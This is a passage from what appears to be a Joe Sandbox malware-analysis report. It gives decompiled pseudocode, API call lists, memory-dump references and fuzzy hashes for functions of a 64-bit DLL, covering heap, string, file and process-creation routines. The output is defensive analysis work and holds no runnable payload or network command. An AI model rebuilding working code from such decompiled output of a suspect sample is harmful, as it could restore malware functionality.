				if (0 == 0) goto 0x80004101;
				if ( *((intOrPtr*)(_t109 + 0x50)) == 0) goto 0x80004110;
				goto 0x80004059;
				GetLastError();
				goto 0x80004110;
				HeapFree(??, ??, ??);
				if (0x102 != 0) goto 0x80004138;
				E000000011800085E4(_t87, __rcx,  *((intOrPtr*)(_t109 + 0x60)));
				goto 0x80004138;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t109 + 0x60)))) + 0x10))();
				goto 0x80004166;
				goto 0x80004166;
				 *(_t106 + 0x60) =  *(_t106 + 0x60) & 0x00000008;
				goto 0x80004166;
				if (GetLastError() != 0x2efe) goto 0x80004166;
				 *(_t106 + 0x60) =  *(_t106 + 0x60) & 0x00000000;
				return 0;
			}

0x180003fda
0x180003fe1
0x180003fef
0x180003ff7
0x180003fff
0x18000400a
0x18000400c
0x180004012
0x18000401c
0x18000402e
0x180004036
0x18000403e
0x180004047
0x180004053
0x180004062
0x18000406a
0x180004070
0x180004083
0x180004089
0x18000408b
0x180004091
0x180004098
0x18000409d
0x1800040a0
0x1800040a6
0x1800040a9
0x1800040ae
0x1800040b3
0x1800040b5
0x1800040b7
0x1800040cd
0x1800040d8
0x1800040e0
0x1800040eb
0x1800040ed
0x1800040f3
0x1800040fa
0x1800040fc
0x180004101
0x180004109
0x180004118
0x180004120
0x18000412a
0x180004131
0x180004140
0x180004143
0x18000414a
0x18000414c
0x18000414f
0x18000415e
0x180004160
0x180004172

APIs

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

HeapAlloc.KERNEL32 ref: 0000000180004047
GetLastError.KERNEL32 ref: 00000001800040B7
WaitForSingleObject.KERNEL32 ref: 00000001800040C5
GetLastError.KERNEL32 ref: 0000000180004101
HeapFree.KERNEL32 ref: 0000000180004118

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: ErrorLast$Heap$AllocFreeObjectSingleWait
String ID:
API String ID: 2540544816-0
Opcode ID: 2125c37f1b6f3d76281b7aab6874424e369f3f46deb369ce77790706a182fef6
Instruction ID: f07a79ff2e09cda6f9955aa739d580884efaaa7540e40516afedcf37a36379f0
Opcode Fuzzy Hash: 2125c37f1b6f3d76281b7aab6874424e369f3f46deb369ce77790706a182fef6
Instruction Fuzzy Hash: B54143B330464986EB92DB66D8403EA73A1F78CBD1F048425BE498BB95DF78C68DC714

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800091F8 Relevance: 9.1, APIs: 6, Instructions: 80
timeCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E000000011800091F8(void* __ecx, long long __rbx, signed long long __rcx, signed long long __rdx, long long __rsi, void* __rbp, void* __r9, signed long long* _a8, void* _a16, void* _a24) {
				void* _t46;
				long _t52;
				void* _t54;
				signed long long _t67;
				long long _t69;
				signed long long* _t73;
				signed long long _t80;
				signed long long _t87;
				intOrPtr _t90;
				struct _FILETIME* _t91;
				void* _t98;
				void* _t103;
				signed long long _t104;
				signed long long* _t105;

				_t103 = _t98;
				 *((long long*)(_t103 + 0x10)) = __rbx;
				 *((long long*)(_t103 + 0x18)) = __rsi;
				 *(_t103 + 8) =  *(_t103 + 8) & 0x00000000;
				 *((long long*)(_t103 - 0x18)) = _t103 + 8;
				_t46 =  *((intOrPtr*)(__rcx + 0xa0))();
				_t73 = _a8;
				if (_t73 == 0) goto 0x8000925e;
				_t87 = _t73 + 0x18;
				 *(_t73 + 0x20) = _t87;
				_a8[3] = _t87;
				_a8[2] = __rcx;
				_a8[1] = __rdx;
				 *_a8 =  *_a8 | 0xffffffff;
				if (_t46 != 0) goto 0x80009327;
				GetSystemTimeAsFileTime(_t91);
				EnterCriticalSection(??);
				_t104 = __rcx + 0x88;
				_t80 =  *(_t104 + 8);
				_a8[3] = _t104;
				_a8[4] = _t80;
				 *_t80 =  &(_a8[3]);
				_t67 =  &(_a8[3]);
				 *(_t104 + 8) = _t67;
				LeaveCriticalSection(??);
				asm("lock add dword [edi+0x40], 0x1");
				E00000001180006C8C(__ecx, _t67, __rbx, 0x180004c4c, _a8, __rdx, __rbp,  &(_a8[7]));
				_a8[6] = _t67;
				if (_a8[6] != 0) goto 0x80009331;
				_t52 = GetLastError();
				EnterCriticalSection(??);
				_t105 = _a8;
				_t69 =  *((intOrPtr*)(_t105 + 0x20));
				_t90 =  *((intOrPtr*)(_t105 + 0x18));
				 *_t69 = _t90;
				 *((long long*)(_t90 + 8)) = _t69;
				LeaveCriticalSection(??);
				asm("lock add dword [edi+0x40], 0xffffffff");
				if (_t52 == 0) goto 0x80009331;
				if (_a8 == 0) goto 0x80009331;
				E00000001180002770(_t54, _a8);
				return _t52;
			}

0x1800091f8
0x1800091fb
0x1800091ff
0x180009208
0x180009214
0x18000921b
0x180009221
0x18000922b
0x18000922d
0x180009231
0x18000923a
0x180009243
0x18000924c
0x180009255
0x180009260
0x18000926a
0x180009274
0x18000927f
0x180009286
0x18000928a
0x180009293
0x1800092a0
0x1800092ac
0x1800092b0
0x1800092b4
0x1800092ba
0x1800092cf
0x1800092d9
0x1800092e7
0x1800092f3
0x1800092f5
0x1800092fb
0x180009300
0x180009304
0x18000930c
0x18000930f
0x180009313
0x180009319
0x180009320
0x18000932a
0x18000932c
0x180009342

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000000018000926A
EnterCriticalSection.KERNEL32 ref: 0000000180009274
LeaveCriticalSection.KERNEL32 ref: 00000001800092B4
GetLastError.KERNEL32 ref: 00000001800092E9
EnterCriticalSection.KERNEL32 ref: 00000001800092F5
LeaveCriticalSection.KERNEL32 ref: 0000000180009313

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: CriticalSection$EnterLeaveTime$ErrorFileLastSystem
String ID:
API String ID: 3478816279-0
Opcode ID: 8f23624cea707e58dae8fde3f8c92bf3611580a11c447dc04c2f461c6a941a79
Instruction ID: bca48ed322468cd715f0c7fdd995b284444db085db22600a9e38dd0ce7ab83a9
Opcode Fuzzy Hash: 8f23624cea707e58dae8fde3f8c92bf3611580a11c447dc04c2f461c6a941a79
Instruction Fuzzy Hash: 18415676204F4992DB44CF55E48439D73B4F789B94F608221EBAD837A4DF3ACA6AC740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005A0C Relevance: 9.1, APIs: 6, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005A5E
HeapAlloc.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005A72
WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AA0
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AB4
HeapFree.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AC4
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,0000000180003748,?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 0000000180005AD3

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: ByteCharErrorHeapLastMultiWide$AllocFree
String ID:
API String ID: 2267670476-0
Opcode ID: 239e5c35e8e62ae3583b30c7b5811d5668ef9734cbd357c9bf41832aa8aa9b74
Instruction ID: 6c13c8b96c3627637da9d419a19c7af847a2c5e8b3803c2844c54b1b1a61164e
Opcode Fuzzy Hash: 239e5c35e8e62ae3583b30c7b5811d5668ef9734cbd357c9bf41832aa8aa9b74
Instruction Fuzzy Hash: 1B21A132304B4886E391DF63B88879A76A5F74CBD0F69C139EE9A93750DF34C9498701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180009B7C Relevance: 9.1, APIs: 6, Instructions: 60
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E00000001180009B7C(long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, long long __r8, void* _a8, void* _a16, void* _a24, void* _a32) {
				intOrPtr _v40;
				long long _v56;
				void* _t32;
				intOrPtr _t33;
				void* _t55;
				WCHAR* _t63;
				WCHAR* _t66;
				CHAR* _t69;

				_t32 = _t55;
				 *((long long*)(_t32 + 8)) = __rbx;
				 *((long long*)(_t32 + 0x10)) = __rbp;
				 *((long long*)(_t32 + 0x18)) = __rsi;
				 *((long long*)(_t32 + 0x20)) = __rdi;
				_t33 =  *0x8000d4a0;
				lstrlenA(_t69);
				lstrlenW(_t66);
				lstrlenW(_t63);
				r8d = __rbx + _t33 + 0x12;
				HeapAlloc(??, ??, ??);
				if (_t33 == 0) goto 0x80009c2e;
				_v56 = __r8;
				__imp__wnsprintfW();
				r9d = 0;
				r8d = 0;
				E00000001180006754(__rbx, __rcx, _t33, __r8, __rdx,  *0x8000d490 + 0x80011438);
				HeapFree(??, ??, ??);
				goto 0x80009c32;
				return _v40;
			}

0x180009b7c
0x180009b7f
0x180009b83
0x180009b87
0x180009b8b
0x180009b99
0x180009bb6
0x180009bbf
0x180009bca
0x180009bd9
0x180009bdf
0x180009beb
0x180009c00
0x180009c05
0x180009c0b
0x180009c0e
0x180009c17
0x180009c26
0x180009c2c
0x180009c52

APIs

lstrlenA.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BB6
lstrlenW.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BBF
lstrlenW.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BCA
HeapAlloc.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009BDF
wnsprintfW.SHLWAPI ref: 0000000180009C05

Part of subcall function 0000000180006754: memset.NTDLL ref: 0000000180006786
Part of subcall function 0000000180006754: CreateProcessW.KERNEL32 ref: 00000001800067F7
Part of subcall function 0000000180006754: WaitForMultipleObjects.KERNEL32 ref: 0000000180006824
Part of subcall function 0000000180006754: TerminateProcess.KERNEL32 ref: 0000000180006844
Part of subcall function 0000000180006754: CloseHandle.KERNEL32 ref: 000000018000684F
Part of subcall function 0000000180006754: CloseHandle.KERNEL32 ref: 000000018000685A
Part of subcall function 0000000180006754: HeapFree.KERNEL32 ref: 0000000180006877

HeapFree.KERNEL32(?,?,?,?,?,00000000,00000000,00000001800019DC), ref: 0000000180009C26

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: Heaplstrlen$CloseFreeHandleProcess$AllocCreateMultipleObjectsTerminateWaitmemsetwnsprintf
String ID:
API String ID: 3150570956-0
Opcode ID: 6cd4a2c8511e4e4c6e1545c7a0fa09ed279638593f974f86d33c3e35563dcb8d
Instruction ID: c1893427c912dd33d9beb41109e2d516a90994c651c2d5da5d8851701b433d67
Opcode Fuzzy Hash: 6cd4a2c8511e4e4c6e1545c7a0fa09ed279638593f974f86d33c3e35563dcb8d
Instruction Fuzzy Hash: DD217F35710B48C6EB45CF66A85479A77A0F78CFC4F848126EE5A43B64DF38D60ACB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180004DD0 Relevance: 8.8, APIs: 7, Instructions: 80
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E00000001180004DD0(long long __rbx, void* __rcx, long long* __rdx, long long __rsi, long long* __r8) {
				void* _t13;
				intOrPtr* _t39;
				intOrPtr _t41;
				CHAR* _t54;
				long long _t60;
				long long _t61;
				void* _t63;
				long _t69;
				long _t73;
				long long _t74;
				void* _t76;
				CHAR* _t79;

				 *((long long*)(_t63 + 8)) = __rbx;
				 *((long long*)(_t63 + 0x10)) = _t60;
				 *((long long*)(_t63 + 0x18)) = __rsi;
				_t39 =  *0x8000d4a0;
				_t41 =  *((intOrPtr*)(_t39 + 8));
				_t13 = lstrlenA(_t79) + 1;
				r8d = _t13;
				HeapAlloc(_t76, _t73, _t69);
				_t74 = _t39;
				if (_t39 == __rsi) goto 0x80004eb7;
				HeapAlloc(??, ??, ??);
				_t61 = _t39;
				if (_t39 == __rsi) goto 0x80004ea9;
				E00000001180004994(_t39, _t41, __rcx);
				if (_t39 == __rsi) goto 0x80004e62;
				if ( *_t39 !=  *((intOrPtr*)(_t39 + 1))) goto 0x80004e62;
				_t6 = _t39 + 2; // 0x2
				E00000001180004994(_t39, _t41, _t6);
				if (_t39 == __rsi) goto 0x80004e8e;
				r8d = _t13 - r12d;
				memcpy(??, ??, ??);
				 *((intOrPtr*)(_t41 + _t74)) = sil;
				lstrcpyA(_t54);
				goto 0x80004e9c;
				lstrcpyA(??, ??);
				 *_t61 = 0x2f;
				 *((intOrPtr*)(_t61 + 1)) = sil;
				 *__rdx = _t74;
				 *__r8 = _t61;
				goto 0x80004eb7;
				HeapFree(??, ??, ??);
				return 1;
			}

0x180004dd0
0x180004dd5
0x180004dda
0x180004dec
0x180004df9
0x180004e0d
0x180004e0f
0x180004e14
0x180004e1a
0x180004e20
0x180004e2e
0x180004e34
0x180004e3a
0x180004e3f
0x180004e4a
0x180004e51
0x180004e53
0x180004e5a
0x180004e6b
0x180004e72
0x180004e77
0x180004e82
0x180004e86
0x180004e8c
0x180004e8e
0x180004e94
0x180004e98
0x180004e9c
0x180004ea4
0x180004ea7
0x180004eb1
0x180004ed5

APIs

lstrlenA.KERNEL32 ref: 0000000180004E02
HeapAlloc.KERNEL32 ref: 0000000180004E14
HeapAlloc.KERNEL32 ref: 0000000180004E2E
HeapFree.KERNEL32 ref: 0000000180004EB1

Part of subcall function 0000000180004994: strchr.NTDLL ref: 00000001800049B6

memcpy.NTDLL ref: 0000000180004E77
lstrcpyA.KERNEL32 ref: 0000000180004E86
lstrcpyA.KERNEL32 ref: 0000000180004E8E

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: Heap$Alloclstrcpy$Freelstrlenmemcpystrchr
String ID:
API String ID: 2951650171-0
Opcode ID: 25580c475dfecbdfe4d78f5cd292cb49b4452150f233a642b5b76edbf8c5295f
Instruction ID: 05cbd2bd38c1d1587f62c6617ae6625bb3c46c91ac70328d53f87b1fbcc7e3b3
Opcode Fuzzy Hash: 25580c475dfecbdfe4d78f5cd292cb49b4452150f233a642b5b76edbf8c5295f
Instruction Fuzzy Hash: 9C21BF723047D886E782EF66B80839ABA91B38CFD4F49C420FE498B755DE38C649C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800099F4 Relevance: 7.6, APIs: 6, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E000000011800099F4(void* __ecx, long long __rbx, void* __rcx, long long __rdx, void* __rsi, void* __rbp, intOrPtr* __r8, void* __r10, void* __r11, char _a8, long long _a16, long long _a24) {
				void* _v48;
				char _v56;
				char _v64;
				char _v72;
				intOrPtr _v80;
				long long _v88;
				void* __rdi;
				void* _t73;
				long long _t75;
				void* _t91;
				intOrPtr _t106;
				intOrPtr* _t115;

				_t92 = __rsi;
				_a24 = __rbx;
				_a16 = __rdx;
				_t106 =  *((intOrPtr*)(__rcx + 0x40));
				_t75 = __rdx;
				r10d =  *(_t106 + 2) & 0x0000ffff;
				_t115 = __r8;
				if ( *0x8000d4a0 - __r10 + 8 <= 0) goto 0x80009a51;
				_t73 = __r10 + _t106 + 8;
				if (( *0x8000d498 ^ 0xecb028fc) == 0) goto 0x80009a53;
				E00000001180004ED8( *0x8000d498 ^ 0xecb028fc, _t73);
				goto 0x80009a53;
				if (_t73 == 0) goto 0x80009b5c;
				_t9 =  &_a8; // 0x52
				_t10 =  &_v56; // 0x12
				if (E000000011800094E0(__rdx, _t73, _t91, __rsi, __rbp, _t10, _t9) != 0) goto 0x80009b61;
				_t11 = _t73 + 2; // 0x2
				if (_a8 - _t11 <= 0) goto 0x80009aa8;
				_t15 =  &_v64; // 0xa
				_t16 =  &_v48; // 0x1a
				E000000011800081F0(_a8, _t75, _v56, _t92, _t16, _t15, __r11);
				goto 0x80009aad;
				if (0x57 != 0) goto 0x80009b36;
				r13d = _v64;
				_t19 =  &_v72; // 0x2
				_t20 =  &_v64; // 0xa
				_v80 = r13d;
				_v72 =  *_t115;
				_v88 = _v48;
				if (E00000001180006EB0( *_t115, _t75, _t75, _t20, _t19) != 0) goto 0x80009b16;
				memcpy(??, ??, ??);
				 *_t115 = _v72;
				HeapFree(??, ??, ??);
				goto 0x80009b1b;
				memset(??, ??, ??);
				HeapFree(??, ??, ??);
				r8d = _a8;
				memset(??, ??, ??);
				HeapFree(??, ??, ??);
				goto 0x80009b61;
				return 2;
			}

0x1800099f4
0x1800099f4
0x1800099f9
0x180009a0b
0x180009a16
0x180009a19
0x180009a36
0x180009a3c
0x180009a3e
0x180009a45
0x180009a4a
0x180009a4f
0x180009a56
0x180009a5c
0x180009a64
0x180009a77
0x180009a7d
0x180009a87
0x180009a95
0x180009a9a
0x180009a9f
0x180009aa6
0x180009aaf
0x180009ab5
0x180009ac2
0x180009ac7
0x180009acf
0x180009ad4
0x180009ad8
0x180009ae6
0x180009afc
0x180009b0b
0x180009b0e
0x180009b14
0x180009b23
0x180009b30
0x180009b36
0x180009b45
0x180009b54
0x180009b5a
0x180009b78

APIs

memcpy.NTDLL(?,0000000180005069), ref: 0000000180009AFC
HeapFree.KERNEL32(?,0000000180005069), ref: 0000000180009B0E
memset.NTDLL(?,0000000180005069), ref: 0000000180009B23
HeapFree.KERNEL32(?,0000000180005069), ref: 0000000180009B30
memset.NTDLL(?,0000000180005069), ref: 0000000180009B45
HeapFree.KERNEL32(?,0000000180005069), ref: 0000000180009B54

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: FreeHeap$memset$memcpy
String ID:
API String ID: 4172471534-0
Opcode ID: 19c3d6e2ffa1d9129ebda51cd38f1831e22d6d71fe2475a4891dd23ee8e2eb9e
Instruction ID: 54b9a56baf89d223affce05d04c9eed0c8a26e8b2822132c81dbcb815bbc5161
Opcode Fuzzy Hash: 19c3d6e2ffa1d9129ebda51cd38f1831e22d6d71fe2475a4891dd23ee8e2eb9e
Instruction Fuzzy Hash: A9418E32204A8982EA92DB56E4007DBB7A1F7CDBD4F55C012FE8947759EF38C64ACB40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008034 Relevance: 7.6, APIs: 6, Instructions: 78
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00000001180008034(void* __ebx, signed int __edx, void* __ebp, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long __r8, intOrPtr* __r9, void* _a8, void* _a16, long long* _a24, void* _a32) {
				void* _t44;
				void* _t52;
				long long _t53;
				signed long long _t54;
				intOrPtr _t67;
				long _t68;
				long long _t70;
				void* _t77;
				intOrPtr* _t83;
				long _t87;
				void* _t88;
				void* _t90;
				struct _CRITICAL_SECTION* _t92;
				struct _CRITICAL_SECTION* _t96;

				_t52 = _t77;
				 *((long long*)(_t52 + 8)) = __rbx;
				 *((long long*)(_t52 + 0x10)) = __rbp;
				 *((long long*)(_t52 + 0x20)) = __rsi;
				 *((long long*)(_t52 + 0x18)) = __r8;
				_t53 =  *0x8000d4a0;
				_t88 = __rcx;
				EnterCriticalSection(_t96);
				LeaveCriticalSection(_t92);
				HeapAlloc(_t90, _t87, _t68);
				_t70 = _t53;
				if (_t53 == __edx) goto 0x80008129;
				memset(??, ??, ??);
				EnterCriticalSection(??);
				r11d =  *((intOrPtr*)(__rcx + 0xa8));
				_t44 =  >=  ? r11d :  *((intOrPtr*)(__rcx + 0xa8));
				if (_t44 == 0) goto 0x80008111;
				_t54 = __edx + __edx * 4;
				_t14 = _t88 + 0x98; // 0x98
				_t16 = _t54 * 8; // 0xc
				_t83 = _t70 + _t16 + 0xc;
				_t67 =  *_t14;
				 *((intOrPtr*)(_t83 - 0xc)) =  *((intOrPtr*)(_t67 + 0x1c));
				 *((long long*)(_t83 + 0x14)) =  *((intOrPtr*)(_t67 + 0x10));
				 *_t83 =  *((intOrPtr*)(_t67 + 0x18));
				 *((intOrPtr*)(_t83 + 0x28 - 0x1c)) =  *((intOrPtr*)(_t67 + 0x18));
				if (_t44 + 0xffffffff != 0) goto 0x800080e7;
				LeaveCriticalSection(??);
				 *__r9 = __ebp + 1;
				 *_a24 = _t70;
				goto 0x8000812e;
				return 8;
			}

0x180008034
0x180008037
0x18000803b
0x18000803f
0x180008043
0x180008054
0x18000805e
0x18000806f
0x180008082
0x18000809a
0x1800080a2
0x1800080a8
0x1800080b2
0x1800080bc
0x1800080c2
0x1800080cd
0x1800080d3
0x1800080d5
0x1800080da
0x1800080e2
0x1800080e2
0x1800080e7
0x1800080ef
0x1800080f7
0x1800080fe
0x18000810b
0x18000810f
0x180008116
0x180008121
0x180008124
0x180008127
0x18000814c

APIs

EnterCriticalSection.KERNEL32 ref: 000000018000806F
LeaveCriticalSection.KERNEL32 ref: 0000000180008082
HeapAlloc.KERNEL32 ref: 000000018000809A
memset.NTDLL ref: 00000001800080B2
EnterCriticalSection.KERNEL32 ref: 00000001800080BC
LeaveCriticalSection.KERNEL32 ref: 0000000180008116

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocHeapmemset
String ID:
API String ID: 3215818008-0
Opcode ID: a5b05b0876b64fc44e85eded25e425ee8759b37968ca7e229990649024b80293
Instruction ID: 1a3dd1e818266afc597f0a591a41220640f3dae03b5c6049ded73bf0a5c13329
Opcode Fuzzy Hash: a5b05b0876b64fc44e85eded25e425ee8759b37968ca7e229990649024b80293
Instruction Fuzzy Hash: F731A9B2A00B4896DB81CF5AE84878D77A0F748BD4F858026EF4D93360DF34CA9AC740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002668 Relevance: 7.6, APIs: 6, Instructions: 76memorystringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,?,?,?,00000001,00000001800058DA,?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 000000018000269E
HeapAlloc.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 00000001800026B0
lstrcpyA.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 00000001800026DB
CloseHandle.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180002724
GetLastError.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 000000018000272C
HeapFree.KERNEL32(?,?,?,00000001,00000000,00000000,00000000,00000001800015EA), ref: 0000000180002741

Memory Dump Source

Source File: 00000000.00000002.264923072.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000000.00000002.264916129.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264935259.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.264942616.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd

Similarity

API ID: Heap$AllocCloseErrorFreeHandleLastlstrcpylstrlen
String ID:
API String ID: 2779700050-0
Opcode ID: 865beac6f0010f69ec7a2bfeae32a674284dc580b90d05da419d0201c0ed98bc
Instruction ID: 8ed8152a395896e124fdee7dd42a1db6533dceb9cab86c829ebc78b2e775e80d
Opcode Fuzzy Hash: 865beac6f0010f69ec7a2bfeae32a674284dc580b90d05da419d0201c0ed98bc
Instruction Fuzzy Hash: 8221AD36604788C6E7A6DF52B84039AB7A0B78CBE0F48C425FE9A47764CF38D649C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180003698 Relevance: 7.6, APIs: 5, Instructions: 64
memoryCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E00000001180003698(void* __eflags, long long __rbx, void* __rcx, long long __rdx, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, short _a32) {
				void* _v32;
				short _v38;
				short _v40;
				long long _v48;
				signed short _v54;
				signed short _v56;
				void* __rsi;
				void* _t20;
				void* _t24;
				short _t30;
				signed short _t32;
				long long _t44;
				long _t56;
				long _t59;
				void* _t60;
				long long _t63;
				void* _t65;
				void* _t75;
				void* _t76;

				_t45 = __rbx;
				_t75 = _t65;
				 *((long long*)(_t75 + 8)) = __rbx;
				 *((long long*)(_t75 + 0x10)) = __rbp;
				_t44 =  *0x8000d4a0;
				_t60 = __r8;
				_t63 = __rdx;
				_t20 = E00000001180001000(__rbx, _t75 - 0x20, __rdx, _t75 + 0x20);
				r12d = 0;
				if (_t20 != r12d) goto 0x8000376a;
				_t30 = _a32;
				_v38 = _t30;
				_v40 = _t30;
				_t32 = _t30 + 1 + _t30 + 1;
				_v54 = _t32;
				r8d = _t32 & 0x0000ffff;
				HeapAlloc(_t76, _t56, _t59);
				_v48 = _t44;
				if (_t44 == _t76) goto 0x8000375a;
				r8d = 0;
				_v56 = r12w;
				if (RtlOemStringToUnicodeString(??, ??, ??) - r12d >= 0) goto 0x80003731;
				RtlNtStatusToDosError(??);
				goto 0x80003748;
				_t24 = E00000001180005A0C((_v56 & 0x0000ffff) >> 1, _t45, _v48, _t60, _t63, _t63, _t60);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				return _t24;
			}

0x180003698
0x180003698
0x18000369b
0x18000369f
0x1800036ab
0x1800036b2
0x1800036b5
0x1800036c4
0x1800036c9
0x1800036d1
0x1800036d7
0x1800036dd
0x1800036e2
0x1800036ea
0x1800036ed
0x1800036f2
0x1800036f9
0x1800036ff
0x180003707
0x180003713
0x180003716
0x180003725
0x180003729
0x18000372f
0x180003743
0x180003754
0x180003764
0x18000377e

APIs

Part of subcall function 0000000180001000: CreateFileW.KERNEL32 ref: 000000018000104A
Part of subcall function 0000000180001000: GetFileSize.KERNEL32 ref: 000000018000105E
Part of subcall function 0000000180001000: CloseHandle.KERNEL32 ref: 00000001800010D9
Part of subcall function 0000000180001000: HeapFree.KERNEL32 ref: 00000001800010F0

HeapAlloc.KERNEL32(?,?,?,?,00000000,00000000,00000000,0000000180001A09), ref: 00000001800036F9
RtlOemStringToUnicodeString.NTDLL ref: 000000018000371C
RtlNtStatusToDosError.NTDLL ref: 0000000180003729
